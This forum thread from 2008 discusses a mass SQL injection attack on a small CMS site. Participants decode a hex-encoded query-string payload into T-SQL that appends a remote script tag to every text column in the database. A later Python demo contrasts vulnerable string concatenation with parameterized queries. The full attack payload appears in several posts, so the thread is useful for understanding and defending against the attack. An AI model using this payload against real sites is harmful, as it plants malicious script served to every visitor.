TOPIC REVIEW
Mr Pink
Posted - 02 February 2008 : 08:32:24
One of my sites uses Fullxml which is perfect for the job. This week I have noticed a handful of strange URL requests to the site like this:
default.asp?id=28&mnu=http://www.domain.co.uk/forum/lovuqo/zil/&
I'm puzzled as to why someone is accessing the site by adding the http bit to the normal URL. There are a few of these and they are all different.
15 LATEST REPLIES (Newest First)
Podge
Posted - 14 May 2008 : 12:27:22
You need to sanitise all user input. Lots of stuff on Google.
Astralis
Posted - 14 May 2008 : 12:12:35
That's exactly what happened to me. How did they get in? How to stop this??
Podge
Posted - 14 May 2008 : 08:18:37
That's nasty. The query inserts JavaScript into every text-type column in your database.
AnonJr
Posted - 14 May 2008 : 08:15:15
Persistent buggers.
Mr Pink
Posted - 14 May 2008 : 07:37:41
There was another attempt today. I posted the string into the converter and it came up with this:
quote: ?DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.direct84.com/7.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Podge
Posted - 13 May 2008 : 14:50:20
No problem. If it's a CMS you're after then try Umbraco.
Mr Pink
Posted - 13 May 2008 : 13:32:08
Thanks for the information about the script Podge. Very interesting.
I've been trying to get support for months and have decided to change to another package.
Podge
Posted - 13 May 2008 : 11:24:41
It doesn't look like there's a lot of support for FullXml anymore. You might want to ask if there are any security issues on their forum - http://sourceforge.net/forum/forum.php?forum_id=118410
Mr Pink
Posted - 13 May 2008 : 10:48:13
quote: Originally posted by Podge
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE
Is there any more of the hex number, i.e. did you trim it before posting? More than likely there's a URL embedded in it.
http://www.string-functions.com/hex-string.aspx
There is my own URL on the end of it, that's all.
Podge
Posted - 13 May 2008 : 10:17:33
It's nothing new. Hackers are always trying to disguise what they are doing.
I heard about it from SSWUG a few weeks ago - http://www.sswug.org
AnonJr
Posted - 13 May 2008 : 10:06:19
I just learned something new. I would have never thought of someone encoding the string like that.
Thanks for that Podge.
Podge
Posted - 13 May 2008 : 09:29:10
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE
Is there any more of the hex number, i.e. did you trim it before posting? More than likely there's a URL embedded in it.
http://www.string-functions.com/hex-string.aspx
Podge
Posted - 13 May 2008 : 09:24:12
It's part of a mass SQL injection attack - http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
quote: This looks a little complicated but, if we remove the encoding, we get this:
DECLARE @S NVARCHAR(4000); SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000)); EXEC(@S);--
So, here's what this little bit of T-SQL is doing:
- Declaring a variable, S, as an NVARCHAR. For those of us who don't speak T-SQL natively, think of this as a string.
- Taking a long hex value (I took out a few hundred characters where the ... is there) that is really a Unicode string(1) and casting it as NVARCHAR. In other words, we're taking this hex representation of a string and turning it into a real string.
- Once that's done, we execute that string as a T-SQL statement.
So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
This one is a little more complicated but it does something like this:
- Declare a few variables that are used later.
- Do a SQL query on the sysobjects and syscolumns tables. This is some serious mojo as these tables contain a list of ALL the tables and ALL the columns in the database. What this query is looking for is every column in the entire database with a type that contains strings.
- Now, we're going to loop through all of those columns and, in every one of them...
- ...we're going to append the <script>...</script> text.
- Finally, clean up and we're done.
Now that this has run, every bit of text in your database has this malicious script tag appended to it. If you're using that database to contain text/HTML that you're going to insert into your webpages and display to your users, you are now serving up a malicious script to every one of your trusting customers.
AnonJr
Posted - 13 May 2008 : 09:18:22
Off the top of my head it looks like it's trying to inject some SQL, but I couldn't say for sure what it's specifically trying to do. If you sanitize your query strings properly I don't think it's anything to worry about. But I'd get a second opinion on that.
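The remedy that AnonJr and, later in the thread, Podge gesture at ("sanitise all user input") comes down to one rule: never splice a request value into SQL text. The following is an added example, not code from the forum, from FullXml or from the linked blog. The site in the thread is classic ASP against SQL Server; sqlite3 is used here only because it ships with Python and runs offline, and executescript() stands in for SQL Server's batch execution (the database runs every statement in the string the application sends). The pages table and the injected mnu value are constructed; the injected value mirrors the effect the thread describes, a script tag appended to text columns, in SQLite syntax.

```python
"""Concatenated vs. bound query for the mnu parameter (added example, sqlite3 stand-in)."""
import sqlite3

# Constructed attacker value for mnu: the leading '2' closes the intended
# query, the rest is a second statement, the '--' comments out the remainder.
INJECTED_MNU = ("2; UPDATE pages SET body = body || "
                "'<script src=//example.invalid/x.js></script>'; --")


def make_db():
    """Constructed content table standing in for the CMS text columns."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO pages VALUES (1, 'Home'), (2, 'About');
    """)
    return conn


def tampered_rows(conn):
    """Number of rows whose body now carries a script tag."""
    return conn.execute(
        "SELECT COUNT(*) FROM pages WHERE body LIKE '%<script%'").fetchone()[0]


def lookup_concatenated(conn, mnu):
    """VULNERABLE pattern: the request value becomes part of the SQL text.

    executescript() mimics a SQL Server batch: every statement after the ';'
    runs with the application's database rights. Returns the damage count."""
    conn.executescript("SELECT body FROM pages WHERE id = " + mnu + ";")
    return tampered_rows(conn)


def lookup_bound_only(conn, mnu):
    """HARDENED, step 1: bind the value. The whole string is compared as data
    against the id column; no second statement exists to run."""
    return conn.execute("SELECT body FROM pages WHERE id = ?", (mnu,)).fetchall()


def lookup_validated(conn, mnu):
    """HARDENED, step 2: also enforce the type the page expects (an integer id),
    so junk is rejected before it reaches the database and can be logged."""
    try:
        page_id = int(mnu)
    except ValueError:
        return None
    row = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def demo():
    """Run the three variants against fresh databases and report the outcomes."""
    vuln = make_db()
    before = tampered_rows(vuln)                         # 0 rows touched
    after_concat = lookup_concatenated(vuln, INJECTED_MNU)  # every row modified

    safe = make_db()
    bound = lookup_bound_only(safe, INJECTED_MNU)        # [] : no match, no damage
    rejected = lookup_validated(safe, INJECTED_MNU)      # None : not an integer
    legit = lookup_validated(safe, "2")                  # 'About'
    return before, after_concat, bound, rejected, legit, tampered_rows(safe)


if __name__ == "__main__":
    print(demo())
```

In classic ASP the bound form is an ADODB.Command with Parameters.Append(cmd.CreateParameter(...)) instead of a concatenated CommandText; the principle is identical. Note that "sanitising" by stripping quotes would not have helped here: the payload in this thread contains no quote characters at all outside the hex constant, which is exactly why it was encoded that way.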
Mr Pink
Posted - 13 May 2008 : 08:29:55
default.asp?id=2&mnu=2;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045
Does anyone know what the above inserted into a url will do?